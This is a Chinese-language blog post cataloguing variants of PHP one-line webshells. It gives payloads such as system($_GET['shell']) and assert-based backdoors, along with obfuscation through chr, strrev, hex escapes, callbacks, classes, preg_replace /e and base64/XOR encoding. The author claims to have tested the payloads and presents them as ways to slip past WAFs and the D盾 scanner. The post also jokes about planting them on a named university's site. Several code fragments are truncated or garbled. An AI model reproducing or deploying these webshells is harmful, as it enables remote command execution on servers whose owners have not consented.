基于php一句话木马的变种总结

说实话php我只是在w3c系统的看了30分钟，对不是3天30天3个小时是30分钟

那我能不能说我花半个小时接通了一门计算机语言呢      （逃

需要记住的是：熟读PHP手册就会有不一样的发现

 

贴上来的都是亲测能用 php5.4.45  apache phpstudy环境

 

$_GET函数数据来源的web响应木马

@system($_GET['shell']) 

@passthru($_GET['shell'])

同样也适用于以下变形

 

字符串(变量)变形

assert()相比较于eval()要灵活许多（只适用于php7.1以下版本）

 

substr_replace()              //函数把字符串的一部分替换为另一个字符串

（PHP版本为7.2.10时挂马失败，php5.4.45时可以成功）

 

chr()          //从指定 ASCII 值返回字符

strrev()      //反转字符串。

parse_str()   //把查询字符串解析到变量中。

//   \xhh   hh十六进制编码的字符

//    \ddd   ddd八进制编码的字符，或者后向引用

//通过中文乱码字符与strlen(),chr()函数相结合调用assert

 

重新定义函数

简要地说就是将原本一句马变形成一个函数，在此函数上定义木马语句，此原理反之亦然，在此就不多赘述

 

回调函数

回调函数的意思大概就是，在一个函数里，通过调用回调函数（系统函数库里的函数不能随便起名），把一个数组里的元素挨个传递给函数A，最后把函数A里面最后执行数组元素后的结果，一一呈现出来，这就是回调函数。

为了便于理解我编了如下基础的回调函数代码，试着看看或许能够更好地理解

 

大概就是这个意思，这里使用的是call_user_func_array()函数

我们在用该函数试试一句马：

很棒，上去了

 

 (你们没有看到我的Tor browser)

回调函数变形：

为了便于理解源码，基本上每一行后面我都加了注释，为此我还很羞愧的恶补了20分钟的php面向对象编程的模块

x=$a;      //使用this访问当前类的属性$x和$y，赋值给方法的$a,$b两个变量

$this->y=$b;

}

function test() {      //定义方法 test

array_map($this->x,$this->y);       //方法内调用回调函数

}

}      //类结束



$p1=new loveme(assert,array($_POST['shell']));      //从lovem类中创建对象命名为 p1

$p1->test();       //对象$p1指向类loveme的test方法，相当于调用test

?>

 

特殊字符链接干扰

 

基本变化形式

添加换行符（\n）

特别需要注意这里只能使用双引号，单引号不行   因为php里的单引号把内容当成纯文本，不会经过服务器翻译。而双引号则与此相反。里面的内容会经过服务器处理(process).

 

\r   回车 (十六进制 0D)

\t   水平制表符 (十六进制 09)

 

https://www.php.net/manual/zh/regexp.reference.escape.php

php官方文档对转义字符的解释（中文的四级没过也能看得懂！）

 

preg_replace()函数

 

这个函数原本是利用正则表达式替换符合条件的字符串，但是这个函数有一个功能——可执行命令。这个函数的第一个参数是正则表达式，按照PHP的格式，表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”，那么这个函数的第二个参数就会被当作代码执行。

 

数组

 

一维数组

$a($_POST['shell'])];
?>

这里在$a里面还字符串变形了一次

$a($_POST['shell'])];
?>

同样的变化，只是assert变为了十六进制字符组合后，放入一维数组 " " 中

 

多维数组

 $b($_POST['shell'])));
?>

 

类

用类把函数包裹,D盾对类查杀较弱

a"); 

         }

 }

 $b = new me;

 $b->a = $_POST['x'];

?>

 

魔术常量

据说D盾对类的查杀较弱，可以使用类的魔术常量构造一句马

assert();

?>

就是定义一个叫做test的类，然后创建一个叫做assert的方法，属性里面用魔术常量将方法名赋值给变量，最后创建一个实例以调用这个系统，挂刀试试：

 

舒服了，很舒服

（但是php7.1以上用不了，但估计陕西**大学的教务网也用不起那么高版本的php）

 

编码绕过

通过base64编码构造一句马基础：

 

上一个综合较强的php一句马

（类，异或编码，字符拼接）（据说能绕D盾）

c);

    }

}

$zxvg=new ZXVG();

@$zxvg->c=$_POST['shell'];

?>

 

以上总结都是基本形式，就像是乐高的基础部件，其中的每一段都能与任意无数的变种思路相结合，变化出无数种的形式，排列组合一定有一种能绕过所知的waf墙，那就看如何去灵活使用变化了

总结的话语总是那么的苍白无力，不如拿起电脑敲一敲试一试，在实践中的挂马总会是富有激情的探索之路。 

无论在怎么样，这些一句话马也是只能应用于php7.1之下版本的服务器中，在往上的话，或许只能尝试大马或变态的eval()函数了；

 

over